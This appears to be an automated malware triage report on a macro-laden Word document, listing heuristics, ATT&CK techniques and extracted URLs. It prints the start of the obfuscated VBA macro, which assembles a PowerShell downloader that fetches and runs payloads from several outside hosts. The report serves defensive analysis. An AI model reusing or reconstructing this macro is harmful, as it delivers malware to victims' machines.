Verdict: MALICIOUS
Risk Score: 184

Malware Insights

MITRE ATT&CK:
- T1059.005 Visual Basic
- T1204.002 Malicious File
- T1566.001 Spearphishing Attachment
The sample is a malicious OLE document containing VBA macros. The AutoOpen macro triggers a Shell() call, indicating an attempt to execute arbitrary code. The VBA script is heavily obfuscated but appears to download a second-stage payload from the URL http://www.eoskin. The presence of the AutoOpen macro together with the Shell() call strongly suggests this document was delivered as a spearphishing attachment.
Heuristics (7)

- VBA macros detected (medium, 2 related findings), OLE_VBA_MACROS: Document contains VBA macro code.
- Shell() call in VBA (critical), OLE_VBA_SHELL: Shell() call in VBA.
- AutoOpen macro (high), OLE_VBA_AUTOOPEN: AutoOpen macro.
- OLE document has large unaccounted-for region (high), OLE_SLACK_ANOMALY: OLE file is 92,160 bytes but its declared streams total only 35,458 bytes; 56,702 bytes (62%) live in unallocated sector slack. This is the canonical hiding place for pre-macro-era Office exploit payloads (XOR-encoded shellcode reached via a parser pointer-corruption bug in the document structure).
- Legacy WordBasic auto-exec macro marker (medium), OLE_LEGACY_WORDBASIC_AUTOEXEC: OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Suspicious extracted artifact (info), EXTRACTED_FILE_STATIC_TRIAGE: One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
- Embedded URL (info), EMBEDDED_URL: One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  - http://www.eoskin: in document text (OLE body)
  - http://schemas.openxmlformats.org/drawingml/2006/main: in document text (OLE body)
Extracted artifacts (1)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 17083 bytes |

SHA-256: c6b05be6477927d484da47151f2219dcb9d55a49ff5b5f38694e8c80bd8dff24

Detection:
- ClamAV: No threats found
- Obfuscation or payload: likely (carved artifact contains 15 long base64-like blob(s))
Preview script (first 1,000 lines of the extracted script):

```vba
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "DFDBnUzTh"
Function PZukBFBaU()
unlNIsK = "" + hNVEqvv + Mid("naR]82+[cHaR]54),[stRING][cHaR]36).rE'+'plAcE(([cHaR]120+[cHaR]114+[cHaR'+3qw2JIdiw9zqiLs48QUo0WQsI80JbnYSKf", 2, 73) + ivIzYdo + OMlnnQt
LwwJZzo = "" + cHDpZvX + Mid("pHJ84fn58zh72rh;bxrh+xrhr'+'xrh+xrheaP4'+'v+P4vk;}'+'P4'+'v+P4vcaxr'+'h+xrhtch{write-hxrh'+'+xrhost cxrh+xrhw0_P4v+P4vxr'+'h+'+'x'+'rhJcmURSoNt2pZJfn", 14, 121) + fQYNwHi + YZRjtRa
WsrIBZGLk = "" + kzqwrHF + Mid("SYOqtzXlDBYZ']104),[stRING][cHaR]39).rEplAcE(P4v7qfP4v,[stRING]['+'cHaR]124)T32 IEx').R3cCY", 13, 75) + qXzLnDq + cDWkEcS
MKDkPj = "" + svaStwj + Mid("lkvfq4vVpu+xrjMWzwinfOO", 11, 3) + DRcPBdh + qCiHKkJ
URACwUPvOz = "" + KmiTSkf + Mid("Es3WloFvC2rhJ0+[CHAR]102),'+'[CHAR]39-rePLAce xrhcw0xrh,[CHAR]36-CREplaCexrhhXoxrh,kmdX2AYsmE", 14, 71) + DoljFKH + smkEJzc
acKjSAsiDB = "" + YrSZNPw + Mid("TYQhSFrhuxrh'+'+xrhas =xrh+xrh xrAw0Vo LVCDO639Ghj8o3AjJoDK5sU5Di", 7, 27) + jOzMfvG + YzwLwXn
jqBKJP = "" + lklMnPk + Mid("Oimect rMucCJzzllAIRFmdaNKzGVXu6fXj4T", 4, 5) + wzlhbhC + VLQVEoT
ZOhwuwtH = "" + amjYzZL + Mid("E5Sw7NtV(mPfxrh+xrh,xrh+xrhmPx'+'rh+xrhfxrh+xrh)xrh+xrh;cw0karapas =xrh+xrh cw0nxrh+xrhsxrh+xrhaxrh+xrhdasd.nextxrh+xrh(xrh+xrh1, 34xrh+xrh3xrh+xrh24xrh+xrh5);xrh+xrhcw0xrh+P4v+P4vxrhhxrhP4v+P4v+x7T1h5oirGoEmjIl", 9, 188) + hVtziqY + itvZZbf
JrITL = "" + ljotwXp + Mid("8ELh.exrhP4v+P4v+xrhxem'+'Pfxrh+xrh;foxrh+xrhrexrh+xrhaxrh+xrhchxrh+'+'xrh(cw0abc iP4v+P4vxrh+xrhnxrh+xrh cwP4v+P4'+'vxrh+xr'+'hP4v+P4v0bcd){try{xrh+'+'xrhcw0xrhK5HwiHkn", 4, 158) + BRPLqnW + zSGkjzT
LSJZADdV = "" + lfdHkRE + Mid("a NCfPx'+'rh) -rePLAce ([CHAR]109'+'+[CHP4v+P4vAR]8620JJF", 7, 46) + BWtszmQ + vGYlKXY
FLiiF = "" + GbOCJGu + Mid("GM9sSBIhmPf xrhP4v+PoMJ1n8aHsR9l", 8, 13) + wnMvuCl + KBolqNc
UMFcr = "" + WIOScGf + Mid("pKG3anxrh+xrhdxrh+xP'+'4v+P4vrhoxrh+P4v+P4vxrhmxrP4v+P4vh+xrh;cxrh+xrhw0bcdP'+'4v+P4v = mPfhttp://www.eoskin'+'.cnxrh+xrh/dxrh+xP4v+P4vrh/P4v+P4v,hxrh+'+'xrhttpxrh+xrh://'+'febaCIAYHZ2QdQWjhb22", 5, 173) + zLwRlRB + zctTwwf
vXjPSSldVY = "" + WYlVfwT + Mid("sTkGT9qK (' (P4v((xrhcw'+'0fxrh+xrhranc = new-oxrh+xrhbjectxrh+xrh SyP4v+P4vstem.Net.WebCli'+'enxrh+xrht;cxrh+xrhwxrh+xrhP4v+P4v0nsadxrh+xrhasxrh+xrhd '+'=xrh+xrh new'+'-'+'objULoDI", 9, 168) + iTsdpEJ + IPWDQmj
wLGlUErlBkI = "" + icRjRzF + Mid("rMX22I37ITwEpLAce('P4v',[sTRING][CHar]39).REpLAce(([CHar]84+[CHar]51+[CHar]50),'|') | &( $env:cOmSPec[4,15,25]-Join'')VIAFd", 12, 107) + kWQfQkw + LizsAji
XIFlMQR = "" + mhVilFF + Mid("2mGGV70lvC0PQY6ihtxrh+xr'+'hep.coxrh+xrhmx'+'rh+xrh/'+'Sxrh+x'+'rhSbTyrS/xrh+xrhmPf.Splxrh+xrhitY616Aaj", 18, 79) + jQIhpXR + GiSZmYH
zbTvYUJiX = "" + WSvcDlT + Mid("zTjkjinrhm/ilZxrh+xrh/xrh+xrh,P4v+P4vxrh+xr'+'hhxrh+xrhttpxrh+xrh:xrP'+azf09FJkfE0JJvQtpqkSiDqqYzXSnjv", 8, 64) + PUDLbUo + SiBIlEV
rqMSlCDaI = "" + iKVWOwv + Mid("fd[CHAR]92)7qf&( XR6sHeLLID[1]+XR6sheLLiD[13]P4v+P4v+xrhxxP4v+P4vrh)P4v).rEplAcE(([cHaR]88+[cHtovrqvj13zwC", 3, 92) + BJQcKch + vGjsuRp
jbEpSCN = "" + mPpYJbG + Mid("WbL7OtU'4v+P4vh+xrh//vixrh+xrhrtualdxrhP4v+P4v+xrhoorxrP4v+P4vh+xrhsNi7SD", 8, 61) + wjbtOoT + ZcwpLwv
jiYkGPpRpa = "" + CVINZRN + Mid("SQJqCMjYh3v4iBBD7XW0XjU4T3Js9vM4GJGu.nexrh+xrht/'+'YAqJxrh+xrh/xrh+xrh,htxrh+xrhtpxrh+xrh://www.emont-P4v+P4vdP4v+P4vnxr'+'h+xrhepr.xrh+xrhcom/'+'DZonxrh+xr'+'htEn/,httP4v+P4vp://www.ecobui'+'ldsolutionsxrh+xrhgh.coxrh+x5mt", 37, 184) + XEEuJhi + hrFCvLs
DbMzKwl = "" + jzZdMzM + Mid("NsoJ7JRboWKnzn9KYBh+x'+'rhcw0enxrh+xrhv:xrh+xrhpxrhP4v+P4'+'v+xrhublxrh'+'+xrhic +xP4v+P4vrhP4v+P4v+xP4v+P4vrh mPfhXoxrh+xrMDjPNJ", 19, 105) + YROVfRm + FfIIYdZ
bcOXuM = "" + cSwtNWf + Mid("M13oke-Ixrh+xrhtemxrh+P4v'+'+P4vxrh(cxrhP4v+P4v'+'+xrhw0xrh+'+'xrhhP4v+P4vuaxr'+'h+xr'+'hs)xrh'+'+xiiYbZr99DoTlFqHvvd7R0ZW8wzS", 4, 96) + ohGQMdC + brjwBUn
KSvpp = "" + JfQDjWo + Mid("aQwd8Zb),xrh+xrh cxrh
```

... (truncated)